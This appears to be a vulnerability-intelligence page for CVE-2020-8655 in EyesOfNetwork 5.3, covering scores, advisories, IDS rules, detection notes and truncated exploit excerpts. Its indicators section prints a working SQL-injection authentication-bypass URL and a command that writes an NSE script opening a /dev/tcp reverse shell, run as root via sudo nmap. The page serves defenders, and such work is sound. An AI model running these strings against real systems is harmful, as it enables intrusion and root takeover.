CVE-2020-8655
Published 2020-02-07
Priority P183 · high · CVSS 3.1 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
- CISA Known Exploited Vulnerability (remediation due 2022-05-03)
- Exploited in the wild
- EPSS: 58.08% (99.0th percentile)
An issue was discovered in EyesOfNetwork 5.3. The sudoers configuration is prone to a privilege escalation vulnerability, allowing the apache user to run arbitrary commands as root via a crafted NSE script for nmap 7.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eyesofnetwork | eyesofnetwork | — | — |
Detection & IOCs (extracted from sources)
- URL: `/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet`
- Command: `;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #`
Snort rule:

```
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
```

Detection notes:
- Detect POST requests to /lilac/autodiscovery.php containing 'request=autodiscover', 'nmap_binary', 'target[]', and 'os.execute(' in the body. The combination indicates NSE payload injection for CVE-2020-8655 privilege escalation via nmap.
- Monitor for creation of NSE script files in /tmp (e.g. /tmp/h4k) followed by execution of 'sudo /usr/bin/nmap' with a --script flag pointing to /tmp. This is the privilege escalation execution chain for CVE-2020-8655.
- Flag the exploit-specific user-agent string 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37' in HTTP logs, as it is hardcoded in the public PoC exploit script.
- Detect the command injection pattern ';id #' or similar semicolon-prefixed commands with a trailing '#' comment in the target[] POST parameter of autodiscovery.php.
- The Metasploit module requires HTTPS (SSL=true) and will not function over plain HTTP; RPORT defaults to 443.
- The nmap privesc (CVE-2020-8655) depends on nmap version 6.40 being present, which lacks the -c and -e options, making NSE script execution the only viable escalation path.
- Authentication bypass via hardcoded API key applies only to EON 5.3; EON 5.1 and 5.2 can only be exploited via SQL injection.
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| NVD | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| VulnCheck | — | 7.8 | HIGH | — |
| CISA | — | 7.8 | HIGH | — |
GHSA
GHSA-qhg6-px34-g7qc: An issue was discovered in EyesOfNetwork 5
ghsa_unreviewed · 2022-05-24 · CVE-2020-8655 [HIGH] · CWE-269
An issue was discovered in EyesOfNetwork 5.3. The sudoers configuration is prone to a privilege escalation vulnerability, allowing the apache user to run arbitrary commands as root via a crafted NSE script for nmap 7.
VulnCheck
EyesOfNetwork Improper Privilege Management Vulnerability
vulncheck · 2020 · CVSS 7.8 · CVE-2020-8655 [HIGH] · CWE-269
EyesOfNetwork contains an improper privilege management vulnerability that may allow a user to run commands as root via a crafted Nmap Scripting Engine (NSE) script to nmap 7.
Affected: EyesOfNetwork EyesOfNetwork
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/743d1c5492ba
Remediation Due: 2022-05-03
CISA
EyesOfNetwork Improper Privilege Management Vulnerability
cisa · 2021-11-03 · CVSS 7.8 · CVE-2020-8655 [HIGH] · CWE-269
Affected: EyesOfNetwork EyesOfNetwork
EyesOfNetwork contains an improper privilege management vulnerability that may allow a user to run commands as root via a crafted Nmap Scripting Engine (NSE) script to nmap 7.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-8655
Remediation Due Date: 2022-05-03
Suricata
ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)
suricata · 2021-11-01 · CVSS 8.8 · CVE-2020-8654 [HIGH]
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signa
Exploit-DB
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
exploitdb · 2020-03-05 · CVE-2020-8657

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'EyesOfNetwork AutoDiscovery Target Command Execution',
  'Description' => %q{
    This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3
    and prior in order to execute arbitrary commands as root.
    This module takes advantage of a command injection vulnerability in the
    `target` parameter of the AutoDiscovery functionality within the EON web
    interface in order to write an Nmap NSE script containing the payload to
    disk. It then starts an Nmap scan to activate the payload. This results in
    privilege escalation because the `apache` user can execute Nm
```
Exploit-DB
EyesOfNetwork 5.3 - Remote Code Execution
exploitdb · 2020-02-07 · CVSS 8.8 · CVE-2020-8656 [HIGH]

```python
# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
# Date: 2020-02-01
# Exploit Author: Clément Billac
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656
#!/bin/env python3
# coding: utf8
#
#
# CVE-2020-8654 - Discovery module allows running arbitrary OS commands
# We were able to run the 'id' command with the following payload in the target field: ';id #'.
#
# CVE-2020-8655 - LPE via nmap NSE script
# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
# nmap version 6.40 is used and doesn't have
```
Nuclei
EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
nuclei · CVSS 8.8 · CVE-2020-8654 [HIGH]
EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.
Template:

```yaml
id: CVE-2020-8654

info:
  name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
  author: praetorian-thendrickson
  severity: high
  description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context
```
Metasploit
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
metasploit
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary commands as root. This module takes advantage of a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface in order to write an Nmap NSE script containing the payload to disk. It then starts an Nmap scan to activate the payload. This results in privilege escalation because the `apache` user can execute Nmap as root. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via various methods, depending on the EON version. EON 5.3 is vulnerable to a hardcoded API key and two SQL injectio
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.html
- https://github.com/EyesOfNetworkCommunity/eonconf/issues/8
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-8655

Timeline
- 2020-02-07: Published
- 2021-11-03: Added to CISA KEV
- Exploited in the wild